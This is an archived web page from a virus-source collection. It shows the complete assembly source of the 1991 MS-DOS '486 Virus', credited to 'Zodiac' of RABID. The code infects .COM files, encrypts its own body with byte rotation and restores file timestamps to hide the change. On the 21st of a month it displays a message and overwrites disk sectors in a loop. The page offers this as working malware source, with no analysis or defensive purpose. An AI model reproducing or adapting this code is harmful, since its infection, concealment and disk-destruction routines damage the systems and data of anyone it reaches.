Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Source code of computer viruses

486 Virus

Virus for MS-DOS

Zodiac
Show all viruses by this author

Description and download

1991-00-00

486.ASM

[Turn off syntax highlighting]
 
; 486 Virus - (C)1991 RABID, International
; By Zodiac - RABID High Priest, USA
 
 
code_seg        segment
                assume cs:code_seg,ds:code_seg
                org    100h
 
jmpin:          db   0E9h,00,00                  ; JMP 105
 
start:          push cx
                mov  dx,word ptr cs:[101h]
                add  dx,103h                     ; DX now points to start
                mov  si,dx
 
                mov  bp,dx                       ; pushes offset of PROG
                add  bp,(prog-start)             ; to stack for RET statement
                push bp                          ; of encrypt
                jmp  short unencrypt
 
unencrypt:      db   0B0h                        ; mov al,
value           db   00                          ;        xx
                push si
                cmp  al,0
                je   unencret
                add  si,(prog-start)
                mov  cx,lastbyte-prog
unencloop:      mov  ah,[si]
                push cx
                mov  cl,al
                rol  ah,cl
                pop  cx
                mov  [si],ah
                inc  al
                inc  si
                loop unencloop
unencret:       pop  si
                ret
 
prog:           mov  di,100h
                mov  si,dx
                add  si,(firstthree-start)       ; SI points to 1st six bytes
                mov  cx,3
                rep  movsb                       ; Restores initial 3 bytes
                mov  si,dx
 
                mov  ah,2Ah
                int  21h
                cmp dl,21
                jne  nokill
 
kill:           xor  ax,ax
                int  10h
                mov  ah,9
                mov  dx,si
                add  dx,(message-start)
                int  21h
kill_hd:        mov  ax,26
killoop:        mov  cx,255
                xor  dx,dx
                push ax
                int  26h
                popf
                pop  ax
                dec  ax
                cmp  ax,2
                jg   killoop
                jmp  short kill_hd
 
nokill:         mov  bp,0                        ; BP=0 when in curr. direct.
                mov  dx,(filespec-start)
 
findfirst:      add  dx,si                       ; SI now points to start
                mov  ah,4Eh
                mov  cx,6
                int  21h
                jc   returningfar
 
filefound:      mov  dx,dtaname
                cmp  bp,1
                jne  open
                dec  dx
                db   0C6h,06h,9Dh,00h,"\"        ; mov byte ptr [9Dh],"\"
 
open:           xor  cx,cx
                mov  ax,4301h
                int  21h                         ; sets attribute to normal
                push dx
 
                mov  ax,3D02h
                int  21h                         ; Opens file found
                jc   returningfar                ; Leaves if error
                mov  bx,ax                       ; BX holds file handle
 
                mov  dx,si
                add  dx,(firstthree-start)
                mov  cx,3
                mov  ah,3Fh
                int  21h
                jc   close
                mov  di,dx
                cmp  word ptr [di],5A4Dh
                je   close
                cmp  byte ptr [di],0E9h
                jne  go
                db   8Bh,16h,9Ah,00h             ; mov dx,word ptr [dtasize]
                sub  dx,(lastbyte-firstbyte+4)
                cmp  word ptr [di+1],dx
                je   close
                jmp  short go
 
returningfar:   jmp  short returning
 
go:             xor  cx,cx
                xor  dx,dx
                mov  ax,4200h
                int  21h                         ; Moves to start of file
 
                db   0A1h,9Ah,00h                ; mov ax,word ptr [dtasize]
 
                cmp  ax,486
                jb   closing
                cmp  ax,63000
                ja   closing
 
                sub  ax,3
                mov  word ptr [si+(newthree-start+1)],ax
 
                mov  dx,si
                add  dx,(newthree-start)
                mov  cx,3
                mov  ah,40h
                int  21h                         ; Writes jump
 
                xor  cx,cx
                mov  dx,0
                mov  ax,4202h
                int  21h                         ; Moves to end of file
 
                push si
                mov  di,si
                add  si,(writebody-start)
                add  di,(lastbyte-start+1)
                mov  cx,(writeends-writebody+2)
                rep  movsb
                pop  si
 
                mov  bp,si
                add  bp,(donewriting-start)
                push bp                          ; sets up RET of unenc
 
                mov  bp,si
                add  bp,(lastbyte-start+1)
                call bp
 
donewriting:    xor  si,si
 
closing:        jmp  short close
 
; The following are hubs for conditional jumps
 
returning:      jmp  short return
finding:        jmp  filefound
 
close:          mov  ax,5701h
                db   8Bh,0Eh,96h,00h             ; mov cx,[dtatime]
                db   8Bh,16h,98h,00h             ; mov dx,[dtadate]
                int  21h
                mov  ah,3Eh
                int  21h                         ; closes file
                pop  dx
                xor  cx,cx
                db   8Ah,0Eh,95h,00h             ; mov cl,byte ptr [dtaattr]
                mov  ax,4301h
                int  21h
 
                cmp  si,0
                je   return                      ; checks if file infected
 
                mov  ah,4Fh
                int  21h                         ; finds next file to infected
                jnc  finding
 
                cmp  bp,1
                je   return
                mov  bp,1
                mov  dx,(rootspec-start)
                jmp  findfirst
 
return:         pop  cx
                mov  bp,100h
                jmp  bp                           ; Returns control
 
 
writebody:      mov  al,byte ptr [si+(value-start)]
                inc  al
                mov  byte ptr [si+value-start],al
                push bx
                mov  bx,si
                add  bx,(prog-start)
                mov  cx,lastbyte-prog
encloop:        mov  ah,[bx]
                push cx
                mov  cl,al
                ror  ah,cl
                pop  cx
                mov  [bx],ah
                inc  al
                inc  bx
                loop encloop
                pop  bx
                mov  dx,si
                mov  cx,(lastbyte-firstbyte+1)   ; Adds extra byte as pad
                mov  ah,40h
                int  21h                         ; Writes main part
                mov  bp,si
                add  bp,(unencrypt-start)
                jmp  bp
writeends:
 
 
; -- DATA -- ;
firstthree      db   0CDh,20h,90h
message         db   '486 Virus - (C)1991 RABID, International'
                db   'By Zodiac - RABID Priest$'
rootspec        db   '\'
filespec        db   '*.COM',0
dtaattr         equ  95h
dtatime         equ  96h
dtadate         equ  98h
dtasize         equ  9Ah
dtaname         equ  9Eh
newthree        db   0E9h,0,0
 
firstbyte       =    start
lastbyte        =    newthree+2
code_seg        ends
                end  jmpin
 

By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxer.org aka vx.netlux.org
deenesitfrplruua